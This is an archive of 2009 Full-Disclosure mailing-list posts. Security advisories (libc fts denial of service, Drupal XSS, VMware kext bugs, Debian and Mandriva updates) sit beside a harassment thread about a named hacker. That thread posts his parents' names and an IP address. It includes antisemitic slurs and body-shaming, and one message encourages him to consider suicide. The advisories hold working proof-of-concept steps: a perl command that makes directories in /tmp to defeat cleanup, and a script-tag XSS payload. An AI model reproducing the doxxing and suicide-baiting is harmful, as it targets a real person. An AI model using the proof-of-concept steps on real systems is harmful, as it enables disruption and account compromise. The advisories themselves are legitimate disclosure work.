Re: [Full-disclosure] So weev...
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 We are glad this is being taken well: 02:23 januszeal i read what the kikes did to you 02:23 januszeal i raged :( 02:24 weev lol 02:24 weev i dont mind 02:24 weev theyre doin me a favor ...because as a 5'4, 130-pound guy, there is not much that you can do *but* take this sort of thing well. We would not want to see little Andrew overexert himself. WINTERMUTE On Thu, 01 Oct 2009 22:43:12 -0500 GOBBLES j...@mac.hush.com wrote: I posted on here earlier as netdev.doctor questioning weev on how he feels psychologically. *spins weev around* *grins* I feel such invigorating justice seeing your real identity mirrored. Redundancy. Freedom of information. I hypothesize weev may possibly kill himself, unfortunately. I'm unsure how to approach it because I hear he may have left the United States. If not, he'll cling on like a Michael Crook kinda guy (which he is closely emulating nowadays). These kids are like mean infants. If I were in your shoes, I would intellectually be considering ending my life. However that's just me. I don't think you should. However, if it were me, it would stop the pain, and my life path that I really couldn't ever fix now. This is purity. This is what happens when you become arrogant, come down here with orders from God. You get crucified bitch. Just like Jesus. Your hung on a cross the same place you ruined people's lives. plz advz hep ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Charset: UTF8 Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 3.0 wpwEAQMCAAYFAkrFoLgACgkQAN7xmh8YPB3xOwP/YUfwdfS+i/towpDsMKZVZPYOOfmB HcKiqGAKoA0pZzbBZmwtDL8AtoP3O4rY7/SuDEDmukGBv2cJ25JSWqtlB7xqF1Xm0HsL BPCwhO5/2bBk4UCYHAKlbM1DpzauqYQBFcoRk6peWZV0TNdSWV2d+VK5HX6JX15FNzxO 8sZ4Wdk= =J2Jd -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] So weev...
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Thu, 01 Oct 2009 21:15:08 -0500 GOBBLES gobbles1...@safe- mail.net wrote: She's gorgeous and looks like a great mother. I'm totally surprised, he sounds like he has the nicest family in the world. They do sound nice, bless their hearts. We should have mentioned it earlier, but pops's name is Mark, and Mommy Weev is Catherine, although she has taken to going by Alyse as of late. Contact was initiated with them after our original post, and they claim they have not talked to or seen Andrew in over two years. It appears, sadly, that weev's destructive tendencies have affected even his immediate family. WINTERMUTE -BEGIN PGP SIGNATURE- Charset: UTF8 Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 3.0 wpwEAQMCAAYFAkrFnBEACgkQAN7xmh8YPB18uQQAn34MjmJYHuX7VBjNFEK+fiWLi4Aw Kozxgqg5n2N+73chKDB2L76xExy+EhMPBg+nwZmnVO/81DGnb+DdHFCMnmnwhj5j0Ffn WzJjkB1Me7SCJoJ7Cy60D0+wXXG4QcnpV0JhS9D2PBpLVtCVJv4ym9qP/AOYf5TPSzxU Wqp32QI= =ukGL -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] So weev...
Man, you guys are real elite hackers. You can get into *#ed* and read the chat. Holy fuck, you penetrated the public channel of Encyclopedia Dramatica, which as we all know is the world's most elite hacker crew. 2009/10/2 Wintermute winterm...@hush.com -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 We are glad this is being taken well: 02:23 januszeal i read what the kikes did to you 02:23 januszeal i raged :( 02:24 weev lol 02:24 weev i dont mind 02:24 weev theyre doin me a favor ...because as a 5'4, 130-pound guy, there is not much that you can do *but* take this sort of thing well. We would not want to see little Andrew overexert himself. WINTERMUTE On Thu, 01 Oct 2009 22:43:12 -0500 GOBBLES j...@mac.hush.com wrote: I posted on here earlier as netdev.doctor questioning weev on how he feels psychologically. *spins weev around* *grins* I feel such invigorating justice seeing your real identity mirrored. Redundancy. Freedom of information. I hypothesize weev may possibly kill himself, unfortunately. I'm unsure how to approach it because I hear he may have left the United States. If not, he'll cling on like a Michael Crook kinda guy (which he is closely emulating nowadays). These kids are like mean infants. If I were in your shoes, I would intellectually be considering ending my life. However that's just me. I don't think you should. However, if it were me, it would stop the pain, and my life path that I really couldn't ever fix now. This is purity. This is what happens when you become arrogant, come down here with orders from God. You get crucified bitch. Just like Jesus. Your hung on a cross the same place you ruined people's lives. plz advz hep ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Charset: UTF8 Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 3.0 wpwEAQMCAAYFAkrFoLgACgkQAN7xmh8YPB3xOwP/YUfwdfS+i/towpDsMKZVZPYOOfmB HcKiqGAKoA0pZzbBZmwtDL8AtoP3O4rY7/SuDEDmukGBv2cJ25JSWqtlB7xqF1Xm0HsL BPCwhO5/2bBk4UCYHAKlbM1DpzauqYQBFcoRk6peWZV0TNdSWV2d+VK5HX6JX15FNzxO 8sZ4Wdk= =J2Jd -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VMSA-2009-0013 VMware Fusion resolves two security issues
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 All - the first bug is self-explanatory, # Kernel denial of service vulnerability An integer overflow vulnerability in the vmx86 kernel extension allows for a denial of service by an unprivileged user. The vmx86 kext ioctl handler contains several integer overflows which lead to kernel heap corruptions. These are probably not exploitable, and I didn't try given the second bug, http://www.digit-labs.org/files/exploits/vmware-pop.c # Kernel code execution vulnerability An ioctl vulnerability in the vmx86 kernel extension allows for executing arbitrary code in the kernel context by an unprivileged user. The vmx86 kext ioctl handler permits an unprivileged userland program to initialize several function pointers via the 0x802E564A ioctl code. These function pointers are later used from several reachable locations within the driver, one of which is called immediately after initialization. http://www.digit-labs.org/files/exploits/vmware-fission.c - -- mu-b (m...@digit-labs.org) Only a few people will follow the proof. Whoever does will spend the rest of his life convincing people it is correct. - Anonymous, P ?= NP -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (Darwin) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAkrFvGUACgkQY0H9BP42EjxSCACdEzIXe0D8n+VVplyEsuCbPBKS TjAAnAnHUPOSKrphGeaynF5bIKYQNyPY =lMJv -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] libc:fts_*() Multiple Denial of Service
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[libc:fts_*() Multiple Denial of Service ]
Author: Maksymilian Arciemowicz
SecurityReason.com
Date:
- - Dis.: 03.08.2009
- - Pub.: 02.10.2009
We are going inform all vendors, about this problem.
Affected Software (official):
- - OpenBSD 4.5 (fix available)
- - NetBSD 5.0.1 (fix available)
probably more...
Original URL:
http://securityreason.com/achievement_securityalert/68
- --- 0.Description ---
The fts functions are provided for traversing UNIX file hierarchies. The
fts_open() function returns a handle on a file
hierarchy, which is then supplied to the other fts functions. The function
fts_read() returns a pointer to a structure
describing one of the files in the file hierarchy. The function fts_children()
returns a pointer to a linked list of structures,
each of which describes one of the files contained in a directory within the
hierarchy.
typedef struct _ftsent {
unsigned short fts_info; /* flags for FTSENT structure
*/
char *fts_accpath; /* access path */
char *fts_path; /* root path */
size_t fts_pathlen; /* strlen(fts_path) */
char *fts_name; /* file name */
size_t fts_namelen; /* strlen(fts_name) */
short fts_level; /* depth (-1 to N) */
int fts_errno; /* file errno */
long fts_number; /* local numeric value */
void *fts_pointer; /* local address value */
struct _ftsent *fts_parent; /* parent directory */
struct _ftsent *fts_link; /* next file structure */
struct _ftsent *fts_cycle; /* cycle structure */
struct stat *fts_statp; /* stat(2) information */
} FTSENT;
- --- 1. libc:fts_*() Multiple Denial of Service ---
In March 2009, we have reported an issue (SREASONRES:20090304) in libc (fts.c).
Now we want to present the conclusions and show
the usefulness of this vulnerabality. Fix provided by OpenBSD Team will protect
us by crash but we think, not for all cases,
that are showed in this advisory.
Index: fts.c
===
RCS file: /cvs/src/lib/libc/gen/fts.c,v
retrieving revision 1.41
diff -u -p -r1.41 fts.c
- - --- fts.c 27 Dec 2008 12:30:13 - 1.41
+++ fts.c 10 Feb 2009 09:00:24 -
@@ -633,6 +633,14 @@ fts_build(FTS *sp, int type)
len++;
maxlen = sp-fts_pathlen - len;
+ if (cur-fts_level == SHRT_MAX) {
+ (void)closedir(dirp);
+ cur-fts_info = FTS_ERR;
+ SET(FTS_STOP);
+ errno = ENAMETOOLONG;
+ return (NULL);
+ }
+
level = cur-fts_level + 1;
/* Read the directory, attaching each entry to the `link' pointer. */
So let`s see /etc/rc.d/cleartmp (NetBSD 5.0.1). This script use rm(1) with rf
args.
Line 40-41:
find -x . ! -name . ! -name lost+found ! -name quota.user \
! -name quota.group -exec rm -rf -- {} \; -type d -prune)
here daemon will come to tmp_dir (/tmp) and wants clean it with the sequence
[a-km-pr-zA-Z]*. It will kill this script anytime
when they will be started. So if we create directory A in /tmp, all other
files and directories in alphabetical order, will
not be delete.
Proof of Concept:
User cxib, have created exploit in main /tmp dir.
exploit:
127# cd /tmp perl -e '$a=Cx22;for(1..5){ ! -d $a and mkdir $a and
chdir $a }'
In /tmp we have
# ls -la
total 22
drwxrwxrwt 10 root wheel 512 Aug 11 01:18 .
drwxr-xr-x 27 root wheel 1024 Aug 11 00:09 ..
drwxrwxrwx 2 root wheel 512 Aug 11 00:49 .ICE-unix
- -r--r--r-- 1 root wheel11 Aug 11 00:11 .X0-lock
drwxrwxrwt 2 root wheel 512 Aug 11 00:11 .X11-unix
- -rw-r--r-- 1 root wheel 0 Aug 11 01:18 A
drwxr-xr-x 2 root wheel 512 Aug 11 01:15 B
drwxr-xr-x 3 cxib wheel 512 Aug 6 01:43 CC
drwxr-xr-x 2 root wheel 512 Aug 11 01:15 D
- -rw-r--r-- 1 root wheel 0 Aug 11 01:16 chujwamwmuzg
drwx-- 2 root wheel 512 Aug 11 00:49 kde-root
drwx-- 3 root wheel 512 Aug 11 01:14 ksocket-root
drwx-- 2 root wheel 512 Aug 11 00:11 mc-root
correct behavior will delete all files after reboot. So lets do it.
# reboot
Now we have in /tmp
# ls -la
total 18
drwxrwxrwt 9 root wheel 512 Aug 11 13:57 .
drwxr-xr-x 27 root wheel 1024 Aug 11 14:02 ..
drwxrwxrwx 2 root wheel 512 Aug 11 00:49 .ICE-unix
drwxrwxrwt 2 root wheel 512 Aug 11 01:19 .X11-unix
drwxr-xr-x 3 cxib wheel 512 Aug 6 01:43 CC
drwxr-xr-x 2 root wheel 512 Aug 11 01:15 D
- -rw-r--r-- 1 root wheel 0 Aug 11 01:16 chujwamwmuzg
drwx-- 2 root wheel 512 Aug 11 00:49 kde-root
drwx-- 3 root wheel 512 Aug 11 01:19 ksocket-root
drwx-- 2 root wheel 512 Aug 11 00:11 mc-root
file A and dir B has been deleted. But file chujwamwmuzg and directories
{D,Cx22} are still avaliable. To resolve, we can use
openbsd fix. However, this does not fully resolve the problem. The user can
create a direcory (like Cx22) that can not be
removed by rm(1).
To remove Cx22 folder, we can use program made by openbsd
- ---
#include err.h
#include stdlib.h
#include unistd.h
int
main(int argc, char *argv[])
{
[Full-disclosure] So weev...
216.12.127.190 Enjoy. He's been using this IP address for awhile. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Drupal Service Links 6.x-1.0 XSS Vulnerability
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Description of Vulnerability:
- - - -
Drupal (http://drupal.org) is a robust content management system (CMS)
written in PHP and MySQL that provides extensibility through various
third party modules. The Service links module
(http://drupal.org/project/service_links) enables admins to add links
to a number of social bookmarking sites, blog search sites etc.
The Service Links module contains a cross site scripting vulnerability
because it does not properly sanitize output of content type names
before display.
Systems affected:
- - - -
Drupal 6.14 with Service links 6.x-1.0 was tested and shown to be
vulnerable.
Impact:
- - - ---
XSS vulnerabilities may expose site administrative accounts to
compromise which could lead to web server process compromise.
Mitigating factors:
- - - ---
The Service links module must be installed. To carry out a Service
links based XSS exploit the attacker must have 'administer content
types' permissions.
Proof of Concept:
- - -
1. Install Drupal 6.14
2. Install Service links 6.x-1.0
3. Enable the Service links module from Administer - Site building -
Modules
4. Create a new Content type from Administer - Content management -
Content types and click 'Add content type'
5. For the 'name' field enter scriptalert('xss');/script and save
the content type
6. Click Administer - Site configuration - Service links to trigger
the JavaScript
Technical details:
- -
The Service links module fails to sanitize the output of the content
type names before display. Applying the following patch fixes this
vulnerability.
Patch
- - ---
Applying the following patch mitigates these threats.
- --- service_links/service_links.module2008-02-26 12:01:27.0
-0500
+++ service_links_fixed/service_links.module2009-10-02
06:33:21.0 -0400
@@ -35,11 +35,12 @@ function service_links_admin_settings()
'#title' = t('Where to show the service links'),
'#description' = t('Set the node types and categories you want to
display links for.'),
);
+ $names = array_map('filter_xss', node_get_types('names'));
$form['where_to_show_the_links']['service_links_node_types'] = array(
'#type' = 'checkboxes',
'#title' = t('Node types'),
'#default_value' = variable_get('service_links_node_types', array()),
- -'#options' = node_get_types('names'),
+'#options' = $names,
);
if (module_exists('taxonomy')) {
$form['where_to_show_the_links']['service_links_category_types'] =
array(
- --
Justin C. Klein Keane
http://www.MadIrish.net
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Using GnuPG with Mandriva - http://enigmail.mozdev.org
iPwEAQECAAYFAkrGEWkACgkQkSlsbLsN1gBl7wb+IW9Jk9N8ewZfa4mDxj8W1AVI
jG20xNmLhO9juy8SLe1VD6aAEB5vSDLGOQKB9bIZIuGHRbTwCh1CRYy3RldBCuMn
SKDtBHDpCSLRiy3QfUUeFud7z5GaLoPkJ8x9Esrs3bWtt2mM6AtFmCpuiGWffXWB
oBvlSpBF2QylQi8kZMqcjzQsuVEdJip/nMfbUWYrTWw4mGANXGIZiWG2ADeNKUAR
uI6caEFcLAcSiRP67k8PXyuMuMVY2RWVVmetemBmJKX5ToUNNSHC+Zhw8UUQ9A99
NzGOoXc2dSXhuR9GxJs=
=YUno
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 1898-1] New openswan packages fix denial of service
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1898-1 secur...@debian.org http://www.debian.org/security/ Florian Weimer October 02, 2009 http://www.debian.org/security/faq - Package: openswan Problem type : remote Debian-specific: no CVE Id(s) : CVE-2009-2185 It was discovered that the pluto daemon in the openswan, an implementation of IPSEC and IKE, could crash when processing a crafted X.509 certificate. For the old stable distribution (etch), this problem has been fixed in version 2.4.6+dfsg.2-1.1+etch2. For the stable distribution (lenny), this problem has been fixed in version 2.4.12+dfsg-1.3+lenny2. For the unstable distribution (sid), this problem has been fixed in version 2.6.22+dfsg-1. We recommend that you upgrade your openswan package. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Source archives: http://security.debian.org/pool/updates/main/o/openswan/openswan_2.4.6+dfsg.2.orig.tar.gz Size/MD5 checksum: 3555236 e5ef22979f8a67038f445746fdc7ff38 http://security.debian.org/pool/updates/main/o/openswan/openswan_2.4.6+dfsg.2-1.1+etch2.diff.gz Size/MD5 checksum:91729 e7772358f397628f18f8590b2381a360 http://security.debian.org/pool/updates/main/o/openswan/openswan_2.4.6+dfsg.2-1.1+etch2.dsc Size/MD5 checksum: 879 3210a5ae193686c4f7fcd54c7855d720 Architecture independent packages: http://security.debian.org/pool/updates/main/o/openswan/openswan-modules-source_2.4.6+dfsg.2-1.1+etch2_all.deb Size/MD5 checksum: 522838 0368797b593a98c90d6e06cbe6743413 http://security.debian.org/pool/updates/main/o/openswan/linux-patch-openswan_2.4.6+dfsg.2-1.1+etch2_all.deb Size/MD5 checksum: 599200 1780b2e6a74358d4caf2bde57f3b8f17 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/o/openswan/openswan_2.4.6+dfsg.2-1.1+etch2_alpha.deb Size/MD5 checksum: 1798002 0c82e879ab4437375188a65edc88dc3c amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/o/openswan/openswan_2.4.6+dfsg.2-1.1+etch2_amd64.deb Size/MD5 checksum: 1675158 db6086977260bbb4bb122d1bab3d3af5 arm architecture (ARM) http://security.debian.org/pool/updates/main/o/openswan/openswan_2.4.6+dfsg.2-1.1+etch2_arm.deb Size/MD5 checksum: 1718930 99c1b3db0733aa752802d3bac61dee5a hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/o/openswan/openswan_2.4.6+dfsg.2-1.1+etch2_hppa.deb Size/MD5 checksum: 1771158 7342b46f65862bee24eb47e6d19d3a33 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/o/openswan/openswan_2.4.6+dfsg.2-1.1+etch2_i386.deb Size/MD5 checksum: 1698718 4149cea4bc3176f5882e4c7f84eabf56 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/o/openswan/openswan_2.4.6+dfsg.2-1.1+etch2_ia64.deb Size/MD5 checksum: 1930186 e1026107147145804d91567013b23329 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/o/openswan/openswan_2.4.6+dfsg.2-1.1+etch2_mips.deb Size/MD5 checksum: 1692076 2b7f7d0c3bda2016453e91424c6a483a mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/o/openswan/openswan_2.4.6+dfsg.2-1.1+etch2_mipsel.deb Size/MD5 checksum: 1697442 5ab952bf26a3b392b5c9ef1406a24019 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/o/openswan/openswan_2.4.6+dfsg.2-1.1+etch2_powerpc.deb Size/MD5 checksum: 1667696 e84e9f2d87d6cf1b544e650867877c4e s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/o/openswan/openswan_2.4.6+dfsg.2-1.1+etch2_s390.deb Size/MD5 checksum: 1671262 7d9b4488c61b3261478e4598e2d1cbe9 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/o/openswan/openswan_2.4.6+dfsg.2-1.1+etch2_sparc.deb Size/MD5 checksum: 1689370 f00222a3310c2758204de6ded56cfa4b Debian GNU/Linux 5.0 alias lenny - Source archives: http://security.debian.org/pool/updates/main/o/openswan/openswan_2.4.12+dfsg-1.3+lenny2.dsc Size/MD5 checksum: 1315 2eb502ff966ff81e9da9930889f6199c http://security.debian.org/pool/updates/main/o/openswan/openswan_2.4.12+dfsg.orig.tar.gz
[Full-disclosure] Please ban the Trolls.
don't stop at n3td3v ban the others as well. thank me later, the full-censorship movement ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 1899-1] New strongswan packages fix denial of service
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1899-1 secur...@debian.org http://www.debian.org/security/ Florian Weimer October 02, 2009 http://www.debian.org/security/faq - Package: strongswan Vulnerability : several Problem type : remote Debian-specific: no CVE Id(s) : CVE-2009-1957 CVE-2009-1958 CVE-2009-2185 CVE-2009-2661 Debian Bug : 531612 533837 540144 Several remote vulnerabilities have been discovered in strongswan, an implementation of the IPSEC and IKE protocols. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2009-1957 CVE-2009-1958 The charon daemon can crash when processing certain crafted IKEv2 packets. (The old stable distribution (etch) was not affected by these two problems because it lacks IKEv2 support.) CVE-2009-2185 CVE-2009-2661 The pluto daemon could crash when processing a crafted X.509 certificate. For the old stable distribution (etch), these problems have been fixed in version 2.8.0+dfsg-1+etch2. For the stable distribution (lenny), these problems have been fixed in version 4.2.4-5+lenny3. For the unstable distribution (sid), these problems have been fixed in version 4.3.2-1.1. We recommend that you upgrade your strongswan packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Source archives: http://security.debian.org/pool/updates/main/s/strongswan/strongswan_2.8.0+dfsg-1+etch2.diff.gz Size/MD5 checksum:58570 945cc03b76743138f14b9719a204fedb http://security.debian.org/pool/updates/main/s/strongswan/strongswan_2.8.0+dfsg.orig.tar.gz Size/MD5 checksum: 3155518 8b9ac905b9bcd41fb826e3d67e90a33d http://security.debian.org/pool/updates/main/s/strongswan/strongswan_2.8.0+dfsg-1+etch2.dsc Size/MD5 checksum: 811 6787c4f1c81bc390d2d4c5ef7cd1f004 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/s/strongswan/strongswan_2.8.0+dfsg-1+etch2_alpha.deb Size/MD5 checksum: 1210988 0ea0beeecfd0569a417cdd7a8890afa0 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/s/strongswan/strongswan_2.8.0+dfsg-1+etch2_amd64.deb Size/MD5 checksum: 1100154 e7975b7c9593e6813b1ab2391488fd5e arm architecture (ARM) http://security.debian.org/pool/updates/main/s/strongswan/strongswan_2.8.0+dfsg-1+etch2_arm.deb Size/MD5 checksum: 1070960 49bb60a09eeffd0b82abea6a742099ea hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/s/strongswan/strongswan_2.8.0+dfsg-1+etch2_hppa.deb Size/MD5 checksum: 1133960 e2fd0221197dfc3624ff95095453883a i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/s/strongswan/strongswan_2.8.0+dfsg-1+etch2_i386.deb Size/MD5 checksum: 1054160 3859569cbea184e01cb17158458a86e0 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/s/strongswan/strongswan_2.8.0+dfsg-1+etch2_ia64.deb Size/MD5 checksum: 1453188 ef4f77c2fafc736399b1cf24eba13ab2 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/s/strongswan/strongswan_2.8.0+dfsg-1+etch2_mips.deb Size/MD5 checksum: 1124320 b163fda8163d818f160658bc2b1a764c mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/s/strongswan/strongswan_2.8.0+dfsg-1+etch2_mipsel.deb Size/MD5 checksum: 1129922 d6ae9af171b053e87e4cff2ed30588f1 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/s/strongswan/strongswan_2.8.0+dfsg-1+etch2_powerpc.deb Size/MD5 checksum: 1097810 c9f14e78602cf64488374ff27edb9fa4 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/s/strongswan/strongswan_2.8.0+dfsg-1+etch2_s390.deb Size/MD5 checksum: 1083894 3dac1f759f83817c674e29a9db14dc48 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/s/strongswan/strongswan_2.8.0+dfsg-1+etch2_sparc.deb Size/MD5 checksum: 1030670 e52adc5269d580dd987d1a6a6d031872 Debian GNU/Linux 5.0 alias lenny - Source archives: http://security.debian.org/pool/updates/main/s/strongswan/strongswan_4.2.4-5+lenny3.diff.gz Size/MD5 checksum:61133 b619f96758667d0968c5572c3014d8be
Re: [Full-disclosure] Please ban the Trolls.
1/10 Must Try Harder. On Fri, Oct 2, 2009 at 6:59 PM, full-censors...@hushmail.com wrote: don't stop at n3td3v ban the others as well. thank me later, the full-censorship movement ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] THE FULL-CENSORSHIP MOVEMENT
THE FULL-CENSORSHIP MOVEMENT OUR GOALS * we are a movement of security professionals who will complain about every troll * we believe anybody who offends us should be banned * we will not stop until every troll is banned PAST ACHIEVEMENT * we forced n3td3v to be banned mean as we go on now to get the rest banned CALL FOR MEMBERS * we want every security professional to rise up against full- disclosure trolls and get them banned WORKING GROUP * we would like to create a working task group of all the major email providers to collaborate IP intelligence ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:255 ] perl-DBD-Pg
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:255 http://www.mandriva.com/security/ ___ Package : perl-DBD-Pg Date: October 2, 2009 Affected: Corporate 4.0 ___ Problem Description: A vulnerability was discovered and corrected in perl-DBD-Pg: Heap-based buffer overflow in the DBD::Pg module for Perl might allow context-dependent attackers to execute arbitrary code via unspecified input to an application that uses the getline and pg_getline functions to read database rows. This update provides a fix for this vulnerability. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0663 ___ Updated Packages: Corporate 4.0: e3c38bea68b6e9fe28cc153b3c948c4b corporate/4.0/i586/perl-DBD-Pg-1.43-2.1.20060mlcs4.i586.rpm 4bc29785b1dfd8449775ddbbcce697f6 corporate/4.0/SRPMS/perl-DBD-Pg-1.43-2.1.20060mlcs4.src.rpm Corporate 4.0/X86_64: 341998c53e860a0ea02c32fb62baa8e0 corporate/4.0/x86_64/perl-DBD-Pg-1.43-2.1.20060mlcs4.x86_64.rpm 4bc29785b1dfd8449775ddbbcce697f6 corporate/4.0/SRPMS/perl-DBD-Pg-1.43-2.1.20060mlcs4.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFKxjTBmqjQ0CJFipgRAhTNAKDAB0XF9hjSLVxqTBaX3MyaHs8W7ACgkH+k N7B+FB3d030VS5wVduuznjM= =Tbye -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] THE FULL-CENSORSHIP MOVEMENT
Who is we? Weren't you calling for n3td3v to be allowed back not long ago? Do you see the irony in your message? I know how you can get at least one troll off the list, unsubscribe. On Fri, Oct 2, 2009 at 4:08 PM, full-censors...@hushmail.com wrote: THE FULL-CENSORSHIP MOVEMENT OUR GOALS * we are a movement of security professionals who will complain about every troll * we believe anybody who offends us should be banned * we will not stop until every troll is banned PAST ACHIEVEMENT * we forced n3td3v to be banned mean as we go on now to get the rest banned CALL FOR MEMBERS * we want every security professional to rise up against full- disclosure trolls and get them banned WORKING GROUP * we would like to create a working task group of all the major email providers to collaborate IP intelligence ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] n3td3v the new age martyr of the full-disclosure mailing list
we're making n3td3v a martyr of the full-disclosure mailing list. join hands in a circle and ban the other trolls in the name of our martyr. three cheers for our martyr!!! ban the trolls, ban the trolls, ban the trolls!!! vulcanius vulcan...@gmail.com wrote: Who is we? Weren't you calling for n3td3v to be allowed back not long ago? Do you see the irony in your message? I know how you can get at least one troll off the list, unsubscribe. full-censors...@hushmail.com wrote: THE FULL-CENSORSHIP MOVEMENT OUR GOALS * we are a movement of security professionals who will complain about every troll * we believe anybody who offends us should be banned * we will not stop until every troll is banned ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] So weev...
Hello. There is a strong likelihood chance we can get Andrew into prison for his criminal activity. Weev's affect hasn't just harassed innocents, but also came to the dismay of his former associates, who casted suspicion on due to his poor choices. If you have been victimized by Weev and no legal efforts or requests have worked, please submit any evidence you have to http://tips.fbi.gov. Also, if you have any personal information that is of any value including: - his secrets - personality - pictures - locations - methods of alluding law enforcement - your story of him harasses you or your friends - et cetera please mail them to me personally (or on this list). Thank you, and remember that n3td3v and Gary McKinnon always has the finest in intelligence. Original Message From: Nobody Special infodro...@yahoo.com Apparently from: full-disclosure-boun...@lists.grok.org.uk To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] So weev... Date: Fri, 2 Oct 2009 07:24:35 -0700 (PDT) 216.12.127.190 Enjoy. He's been using this IP address for awhile. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
